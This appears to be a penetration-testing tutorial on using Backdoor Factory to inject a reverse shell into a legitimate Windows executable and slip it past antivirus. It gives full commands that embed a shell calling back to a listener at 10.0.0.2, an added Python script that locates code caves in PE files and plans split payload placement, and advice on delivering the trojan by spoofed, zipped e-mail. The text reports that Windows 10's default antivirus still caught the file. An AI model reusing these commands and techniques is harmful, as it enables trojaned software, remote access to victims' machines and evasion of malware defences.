Using Backdoor-Factory to Evade Antivirus

The exploit code worked well on an XP SP2 machine with no anti-virus software, and would work on any machine without anti-virus installed, but it was far less effective against a Windows 10 machine running nothing more than the default Windows anti-virus. We had to turn off its real-time protection before the e-mail could even be opened without errors, and the anti-virus scrubbed out our doctored file as soon as it saw it. As security engineers, we are happy that Windows 10 ships with such an effective anti-malware feature right out of the gate. As penetration testers, we are disappointed.

Backdoor Factory patches shell-code into an existing, working EXE file without otherwise changing the original very much: the program still runs as before, with the injected payload executing alongside it. You can use the executables in Kali's /usr/share/windows-binaries directory, or any other Windows binary that is not packed or otherwise protected against patching.


The command to run Backdoor Factory and inject a reverse shell that connects back to a listener at 10.0.0.2 on port 43434 is as follows. The cave-jumping option splits the shell-code across several code caves (unused, zero-filled regions of the executable) instead of placing it in one contiguous block, which makes simple signature matching harder:

backdoor-factory --cave-jumping -f /usr/share/windows-binaries/vncviewer.exe -H 10.0.0.2 -P 43434 -s reverse_shell_tcp

If you name a shell-code payload that does not exist (as above, where reverse_shell_tcp is not a valid choice), the application lists the payloads it does support. The corrected command uses reverse_shell_tcp_inline:

backdoor-factory --cave-jumping -f /usr/share/windows-binaries/vncviewer.exe -H 10.0.0.2 -P 43434 -s reverse_shell_tcp_inline

Backdoor Factory then carries on and lists the code caves (the voids, or runs of unused bytes) it found in the binary, with options for which of them the shell-code is injected into:

We will just choose Cave 1.
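As an added example (not part of the original page, and not Backdoor Factory's own code), the script below shows what the tool is doing when it lists caves: it parses the PE section table, reports every run of zero bytes inside a section's raw data that is at least a given size, and then sketches the cave-jumping idea by splitting a payload across several caves with room reserved for a jump between fragments. The tiny PE image it scans, the 100-byte minimum cave size, the 380-byte payload length and the 5-byte jump reservation are constructed assumptions for illustration, not values taken from the tool.

```python
import re
import struct
from collections import namedtuple

# One parsed PE section header (only the fields the cave scan needs).
Section = namedtuple("Section", "name virtual_addr raw_size raw_ptr characteristics")
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_sections(data):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    (_machine, nsec, _ts, _symptr, _nsyms,
     opt_size, _flags) = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(nsec):
        (name, _vsize, vaddr, rsize, rptr, _relocs, _lines, _nrel, _nlin,
         flags) = struct.unpack_from("<8sIIIIIIHHI", data, table + i * 40)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vaddr, rsize, rptr, flags))
    return sections


def find_caves(data, min_size):
    """Return (section, file_offset, length, executable) for every run of NUL
    bytes of at least min_size inside a section's raw data on disk. Such runs
    usually sit in alignment padding at the tail of a section, which is where a
    cave injector finds room for its code."""
    pattern = re.compile(rb"\x00{%d,}" % min_size)
    caves = []
    for sec in parse_sections(data):
        start = sec.raw_ptr
        end = min(start + sec.raw_size, len(data))
        for m in pattern.finditer(data, start, end):
            caves.append((sec.name, m.start(), m.end() - m.start(),
                          bool(sec.characteristics & IMAGE_SCN_MEM_EXECUTE)))
    return caves


def plan_cave_jumping(caves, payload_len, jump_len=5):
    """Greedy cave-jumping plan: fill each cave with as much payload as fits,
    reserving jump_len bytes at the end of every fragment but the last for a
    jmp to the next fragment. Returns [(file_offset, fragment_len)] or None when
    the caves cannot hold the payload. Simplified: the real tool also needs room
    for its register-save and return-to-original-entry stub."""
    plan, remaining = [], payload_len
    for _name, offset, length, _exe in caves:
        if remaining <= length:          # last fragment, no jump needed
            plan.append((offset, remaining))
            return plan
        usable = length - jump_len
        if usable > 0:
            plan.append((offset, usable))
            remaining -= usable
    return None


def build_sample_pe():
    """Constructed sample: a tiny, deliberately non-runnable PE32 image with a
    .text section holding zero runs of 200, 50 and 120 bytes (plus alignment
    padding) and a .data section holding a 300-byte zero run."""
    align = 0x200
    pad = lambda b: b + b"\x00" * (-len(b) % align)
    text = pad(b"\x55\x8b\xec" + b"\x00" * 200 + b"\xc3" * 16 + b"\x00" * 50
               + b"\x90" * 4 + b"\x00" * 120)
    data = pad(b"\x00" * 300 + b"ABCD")
    opt = struct.pack("<H", 0x10B) + b"\x00" * (0xE0 - 2)  # PE32 magic, rest zeroed
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)   # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)

    def shdr(name, vaddr, raw_ptr, body, flags):
        return struct.pack("<8sIIIIIIHHI", name, len(body), vaddr, len(body),
                           raw_ptr, 0, 0, 0, 0, flags)

    headers = dos + b"PE\0\0" + coff + opt
    headers += shdr(b".text", 0x1000, 0x200, text, 0x60000020)          # code, exec, read
    headers += shdr(b".data", 0x2000, 0x200 + len(text), data, 0xC0000040)  # data, read, write
    return pad(headers) + text + data


if __name__ == "__main__":
    image = build_sample_pe()
    found = find_caves(image, 100)
    for name, off, size, exe in found:
        print(f"{name:8s} offset 0x{off:05x} size {size:4d} executable={exe}")
    print("cave-jumping plan for a 380-byte payload:", plan_cave_jumping(found, 380))
```

Caves in a non-executable section (the .data ones above) only help if that section is made executable at load time, which is why a cave injector may need to change the section's access flags; caves in .text padding need no such change, but are also the first place an analyst looks for a patch.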

The patched file is written to the backdoored/ directory, which in our case is ~/backdoored/ in root's home directory, so it is easy to find. We could use the Social Engineering Toolkit to push this doctored file out in a mass mailing, but you can simply e-mail it from a spoofed account to the Windows 10 box to see whether it clears the anti-virus hurdle. The executable had to be zipped to get past the filters on our mail server, and as soon as it was unzipped on the Windows 10 machine it was scrubbed away as malware.

Windows 10's default anti-virus caught this file just as it caught the earlier one from the Social Engineering Toolkit. This is not surprising: cave-jumping only changes where in the file the shell-code sits, while the payload itself is a stock reverse shell whose bytes the scanner already recognises. Older, unpatched versions of Windows without current anti-malware protection are plainly at risk.
